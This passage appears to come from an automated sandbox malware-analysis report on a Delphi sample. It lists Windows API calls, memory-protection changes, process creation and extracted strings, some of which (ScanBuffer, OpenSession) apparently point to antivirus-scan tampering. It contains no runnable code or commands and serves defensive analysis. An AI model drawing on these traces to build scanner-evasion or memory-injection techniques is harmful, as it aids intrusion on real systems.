                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 2022580353-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 02882F02
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F0C
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F2B
                                                                • CharNextA.USER32(00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 02882F35
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F61
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString), ref: 02882F6B
                                                                • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString), ref: 02882F93
                                                                • CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0288300A,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02882F9D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CharNext
                                                                • String ID: $ $ $"$"$"$"$"$"
                                                                • API String ID: 3213498283-3597982963
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 0289413C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02894142
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 02894154
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0289415A
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 0289416C
                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02894172
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 028941BF
                                                                • GetExitCodeThread.KERNEL32(00000000,028CD33C,00000000,000000FF,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll,GetProcAddress,00000000,kernel32.dll,GetModuleHandleA,028CD33C,?,550A74C0), ref: 028941C9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc$CodeExitObjectSingleThreadWait
                                                                • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32.dll
                                                                • API String ID: 3399263034-1503429014
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028828FE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Message
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                • API String ID: 2030045667-32948583
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 028831DC
                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02883200
                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0288321C
                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0288323D
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 02883266
                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 02883274
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 028832AF
                                                                • GetFileType.KERNEL32(?,000000F5), ref: 028832C5
                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 028832E0
                                                                • GetLastError.KERNEL32(000000F5), ref: 028832F8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                • String ID:
                                                                • API String ID: 1694776339-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                • An unexpected memory leak has occurred. , xrefs: 028826C0
                                                                • Unexpected Memory Leak, xrefs: 028828F0
                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02882879
                                                                • 7, xrefs: 028826D1
                                                                • bytes: , xrefs: 0288278D
                                                                • , xrefs: 02882844
                                                                • The unexpected small block leaks are:, xrefs: 02882737
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                • API String ID: 0-2723507874
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • lstrcpyn.KERNEL32(?,?,?), ref: 02885BAC
                                                                • lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 02885C10
                                                                • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 02885C46
                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 02885CAB
                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 02885CB7
                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 02885CD9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$lstrlen
                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                • API String ID: 4046762626-1565342463
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000000,0288C24F,?,?,00000000,00000000), ref: 0288BFBA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: LocaleThread
                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                • API String ID: 635194068-2493093252
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E665
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E681
                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0288E6BA
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E737
                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0288E750
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$BoundIndex$Create
                                                                • String ID:
                                                                • API String ID: 3038511665-3916222277
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0288AF48: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AF65
                                                                  • Part of subcall function 0288AF48: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AF89
                                                                  • Part of subcall function 0288AF48: GetModuleFileNameA.KERNEL32(028DC7F0,?,00000105,?,?,00000105), ref: 0288AFA4
                                                                  • Part of subcall function 0288AF48: LoadStringA.USER32(00000000,02886B34,?,00000100), ref: 0288B03A
                                                                • CharToOemA.USER32(?,?), ref: 0288B107
                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0288B124
                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288B12A
                                                                • GetStdHandle.KERNEL32(000000F4,0288B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288B13F
                                                                • WriteFile.KERNEL32(00000000,000000F4,0288B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288B145
                                                                • LoadStringA.USER32(00000000,02886AAC,?,00000040), ref: 0288B167
                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0288B17D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                • String ID:
                                                                • API String ID: 185507032-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7,?,?,?,00000000,02884892,028866D4,00000067,0288678B,0289D7B0), ref: 02884759
                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7,?,?,?,00000000,02884892,028866D4,00000067,0288678B), ref: 0288475F
                                                                • GetStdHandle.KERNEL32(000000F5,028847A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7), ref: 02884774
                                                                • WriteFile.KERNEL32(00000000,000000F5,028847A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028847E7), ref: 0288477A
                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,0289D778,00000000), ref: 02884798
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileHandleWrite$Message
                                                                • String ID: Runtime error at 00000000
                                                                • API String ID: 1570097196-1393363852
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02894F87
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 028950E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$Alloc$Protect
                                                                • String ID:
                                                                • API String ID: 655996629-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0288AEDC,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0288AD3B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: LocaleThread
                                                                • String ID: eeee$ggg$yyyy
                                                                • API String ID: 635194068-1253427255
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0289C10B,00000000,0289C11E), ref: 0288C60E
                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0288C61F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                • API String ID: 1646373207-3712701948
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C,?,028DD338), ref: 02894466
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C), ref: 02894490
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 028944E8
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,028DD338), ref: 028945AE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocProtect
                                                                • String ID:
                                                                • API String ID: 2447062925-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 028950E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocProtect
                                                                • String ID:
                                                                • API String ID: 2447062925-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C,?,028DD338), ref: 02894466
                                                                • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001,00000000,028945E6,?,028CD33C), ref: 02894490
                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 028944E8
                                                                • VirtualProtect.KERNEL32(?,?,00000000,?,028DD338), ref: 028945AE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocProtect
                                                                • String ID:
                                                                • API String ID: 2447062925-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E3DB
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E3F7
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E46E
                                                                • VariantClear.OLEAUT32(?), ref: 0288E497
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                • String ID:
                                                                • API String ID: 920484758-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AF89
                                                                • GetModuleFileNameA.KERNEL32(028DC7F0,?,00000105,?,?,00000105), ref: 0288AFA4
                                                                • LoadStringA.USER32(00000000,02886B34,?,00000100), ref: 0288B03A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AF89
                                                                • GetModuleFileNameA.KERNEL32(028DC7F0,?,00000105,?,?,00000105), ref: 0288AFA4
                                                                • LoadStringA.USER32(00000000,02886B34,?,00000100), ref: 0288B03A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0288ACF3,?,?,00000000), ref: 0288AC74
                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0288ACF3,?,?,00000000), ref: 0288ACA4
                                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_00009BA8,00000000,00000000,00000004,00000000,0288ACF3,?,?,00000000), ref: 0288ACCD
                                                                • EnumCalendarInfoA.KERNEL32(Function_00009BE4,00000000,00000000,00000003), ref: 0288ACD8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: LocaleThread$CalendarEnumInfo
                                                                • String ID:
                                                                • API String ID: 1139405593-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • lstrcmpi.KERNEL32(?,iexpress.exe), ref: 0289462D
                                                                • CloseHandle.KERNEL32(00000000,?,iexpress.exe,00000000,?,00000002,00000000,?,?,?,0289950E,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer), ref: 0289463B
                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,?,?,?,0289950E,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,ScanString), ref: 02894650
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$lstrcmpi
                                                                • String ID: iexpress.exe
                                                                • API String ID: 957822626-710937349
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0288981E), ref: 028897B6
                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0288981E), ref: 028897BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: DateFormatLocaleThread
                                                                • String ID: yyyy
                                                                • API String ID: 3303714858-3145165042
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                • API String ID: 3535843008-4173385793
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%